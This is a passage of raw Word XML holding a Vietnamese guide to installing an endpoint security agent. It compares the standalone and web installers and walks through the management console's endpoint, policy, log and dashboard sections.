          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. Đối với mô hình nhóm thực nghiệm sẽ sử dụng bản </w:t>
      </w:r>
      <w:r w:rsidR="007D0C70" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Full feature set</w:t>
      </w:r>
      <w:r w:rsidR="00A80C31" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407B5DCB" w14:textId="69DF2AC3" w:rsidR="00944868" w:rsidRPr="007D5E72" w:rsidRDefault="008E5FF7" w:rsidP="002F6166">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Đối với Package type sẽ có 2 mục là </w:t>
      </w:r>
      <w:r w:rsidR="00BC21A9" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Standalone và Web installer</w:t>
      </w:r>
      <w:r w:rsidR="00C04E06" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00A87220" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Standalone</w:t>
      </w:r>
      <w:r w:rsidR="00C04E06" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> s</w:t>
      </w:r>
      <w:r w:rsidR="00CB48CA" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ẽ </w:t>
      </w:r>
      <w:r w:rsidR="00A87220" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>đầy đủ</w:t>
      </w:r>
      <w:r w:rsidR="009544E4" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> tất cả các component </w:t>
      </w:r>
      <w:r w:rsidR="001F7EEE" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>cần thiết để cài đặt mà không cần Endpoint phải có Internet,</w:t>
      </w:r>
      <w:r w:rsidR="009838A8" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> ngược lại, bản Web Installer sẽ yêu cầu Endpoint phải có Internet để down them một số package.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52859AC7" w14:textId="736DC5D3" w:rsidR="00944868" w:rsidRDefault="007D70C3" w:rsidP="002F6166">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3AFC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="554B1E65" wp14:editId="18A65ACD">
            <wp:extent cx="5935980" cy="1386840"/>
            <wp:effectExtent l="19050" t="19050" r="26670" b="22860"/>
            <wp:docPr id="357029350" name="Picture 357029350"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9350" name="Hình ảnh 3" descr="Ảnh có chứa văn bản, Phông chữ, ảnh chụp màn hình,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386840"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0811F25C" w14:textId="73863F54" w:rsidR="000D74A1" w:rsidRPr="002B3AFC" w:rsidRDefault="00C96D1C" w:rsidP="002F6166">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Bản standalone</w:t>
      </w:r>
      <w:r w:rsidR="00790E79" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> nặng</w:t>
      </w:r>
      <w:r w:rsidR="006C32FA" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 475</w:t>
      </w:r>
      <w:r w:rsidR="00597CAF" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006C32FA" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>mb, bản</w:t>
      </w:r>
      <w:r w:rsidR="00597CAF" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Web installer nặng 3mb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510FD5C8" w14:textId="13A3E466" w:rsidR="00C93835" w:rsidRPr="007D5E72" w:rsidRDefault="00C93835" w:rsidP="002F6166">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Sau khi chọn</w:t>
      </w:r>
      <w:r w:rsidR="00166A7F" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> xong package type để download, sẽ có 2 cách để download </w:t>
      </w:r>
      <w:r w:rsidR="00690F71" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Installer về là </w:t>
      </w:r>
      <w:r w:rsidR="00A641A2" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Download Installer để download bộ Installer</w:t>
      </w:r>
      <w:r w:rsidR="00D76E8A" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> về máy</w:t>
      </w:r>
      <w:r w:rsidR="00A641A2" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> hoặc Get download link </w:t>
      </w:r>
      <w:r w:rsidR="00D76E8A" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>để tự tạo ra 1 link download</w:t>
      </w:r>
      <w:r w:rsidR="00CC6C38" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CA7497" w14:textId="0439CEA5" w:rsidR="00597CAF" w:rsidRPr="007D5E72" w:rsidRDefault="002541A8" w:rsidP="002F6166">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Sau khi download</w:t>
      </w:r>
      <w:r w:rsidR="00803D60" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1 trong 2 bộ Installer về, cần </w:t>
      </w:r>
      <w:r w:rsidR="00FC0733" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>gửi sang</w:t>
      </w:r>
      <w:r w:rsidR="00803D60" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FC0733" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>máy Endpoint để tiến hành cài đặt, để cài đặt chỉ cần mở bộ Installer lên, mọi thứ sẽ được cài tự động.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CBB42C" w14:textId="2E26EE22" w:rsidR="00FC0733" w:rsidRPr="007D5E72" w:rsidRDefault="008C3F6B" w:rsidP="002F6166">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Sau khi setup thành công, tại giao diện</w:t>
      </w:r>
      <w:r w:rsidR="006F1012" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> của máy Endpoint sẽ có 1 phần mềm giống như hình</w:t>
      </w:r>
      <w:r w:rsidR="00F201B7" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, khi này setup Agent đã thành công</w:t>
      </w:r>
      <w:r w:rsidR="002B3AFC" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247DE413" w14:textId="55DCED6D" w:rsidR="00BB134F" w:rsidRPr="007D5E72" w:rsidRDefault="005344E5" w:rsidP="002F6166">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1EACE829" wp14:editId="5D306964">
            <wp:extent cx="3726180" cy="3329940"/>
            <wp:effectExtent l="19050" t="19050" r="26670" b="22860"/>
            <wp:docPr id="2017430333" name="Picture 2017430333"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0333" name="Hình ảnh 5" descr="Ảnh có chứa văn bản, ảnh chụp màn hình, phần mềm, Phông chữ&#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3329940"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF78342" w14:textId="7544FDC6" w:rsidR="005344E5" w:rsidRPr="007D5E72" w:rsidRDefault="00BB134F" w:rsidP="002F6166">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc152795837"/>
      <w:r w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Một số chức năng cơ bản</w:t>
      </w:r>
      <w:r w:rsidR="007D5E72" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="50F9C28E" w14:textId="73E70122" w:rsidR="005344E5" w:rsidRPr="007D5E72" w:rsidRDefault="00B56C34" w:rsidP="002F6166">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Trên giao diện Web Console của server, ta có thể quản lý các Endpoint tại mục Directories</w:t>
      </w:r>
      <w:r w:rsidR="00A54A05" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00212896" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="00A54A05" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006159C2" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>User</w:t>
      </w:r>
      <w:r w:rsidR="00212896" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/Endpoints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185D9B6D" w14:textId="4ED73906" w:rsidR="00212896" w:rsidRPr="007D5E72" w:rsidRDefault="00212896" w:rsidP="002F6166">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00212896">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31B37C97" wp14:editId="38368D96">
            <wp:extent cx="5943600" cy="2806065"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="13335"/>
            <wp:docPr id="2112049200" name="Picture 211204920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9200" name="Hình ảnh 1" descr="Ảnh có chứa văn bản, ảnh chụp màn hình, phần mềm, số&#10;&#10;Mô tả được tạo tự động"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2806065"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D21316E" w14:textId="77777777" w:rsidR="0003712E" w:rsidRDefault="0003712E" w:rsidP="002F6166">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B1EAD24" w14:textId="3C55D6A8" w:rsidR="0003712E" w:rsidRPr="007D5E72" w:rsidRDefault="0003712E" w:rsidP="002F6166">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Để cài đặt policy cho</w:t>
      </w:r>
      <w:r w:rsidR="008374CD" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1 hoặc nhiều</w:t>
      </w:r>
      <w:r w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> máy Endpoint </w:t>
      </w:r>
      <w:r w:rsidR="008374CD" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ta </w:t>
      </w:r>
      <w:r w:rsidR="00563891" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>truy c</w:t>
      </w:r>
      <w:r w:rsidR="00353577" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ập vào thư mục </w:t>
      </w:r>
      <w:r w:rsidR="00271A96" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Policies </w:t>
      </w:r>
      <w:r w:rsidR="00CA0B15" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="00271A96" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Polic</w:t>
      </w:r>
      <w:r w:rsidR="00CA0B15" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>y Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB3F133" w14:textId="71BBF827" w:rsidR="0072371F" w:rsidRPr="007D5E72" w:rsidRDefault="00CA0B15" w:rsidP="002F6166">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA0B15">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D46A9FC" wp14:editId="4E806824">
            <wp:extent cx="5943600" cy="2829560"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="27940"/>
            <wp:docPr id="1681363637" name="Picture 1681363637"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63637" name="Hình ảnh 1" descr="Ảnh có chứa văn bản, ảnh chụp màn hình, số, phần mềm&#10;&#10;Mô tả được tạo tự động"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2829560"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA9B3C7" w14:textId="30544F61" w:rsidR="00111201" w:rsidRPr="007D5E72" w:rsidRDefault="00111201" w:rsidP="002F6166">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Để xem log của những sự kiện </w:t>
      </w:r>
      <w:r w:rsidR="002A5A5E" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">đã được detect trên máy Endpoint, truy cập vào thư mục </w:t>
      </w:r>
      <w:r w:rsidR="002B2FEF" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Directories –</w:t>
      </w:r>
      <w:r w:rsidR="00867996" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidR="002B2FEF" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Logs –</w:t>
      </w:r>
      <w:r w:rsidR="00867996" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidR="002B2FEF" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Logs Querry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001572D1" w14:textId="46725BE0" w:rsidR="002B2FEF" w:rsidRPr="007D5E72" w:rsidRDefault="00106472" w:rsidP="002F6166">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00106472">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B24412B" wp14:editId="2DF4732A">
            <wp:extent cx="5943600" cy="2827655"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="10795"/>
            <wp:docPr id="940867805" name="Picture 940867805"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7805" name="Hình ảnh 1" descr="Ảnh có chứa văn bản, ảnh chụp màn hình, số, phần mềm&#10;&#10;Mô tả được tạo tự động"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2827655"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="00098D86" w14:textId="4AC45748" w:rsidR="008F10C3" w:rsidRPr="007D5E72" w:rsidRDefault="008045A0" w:rsidP="002F6166">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Để</w:t>
      </w:r>
      <w:r w:rsidR="00EC02F7" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E72139" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>xem tóm tắt lại những threats</w:t>
      </w:r>
      <w:r w:rsidR="002E6558" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> đã xảy ra, truy cập vào Dashboard</w:t>
      </w:r>
      <w:r w:rsidR="004007DE" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008F10C3" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="00867996" w:rsidRPr="007D5E72">
        <w:rPr>
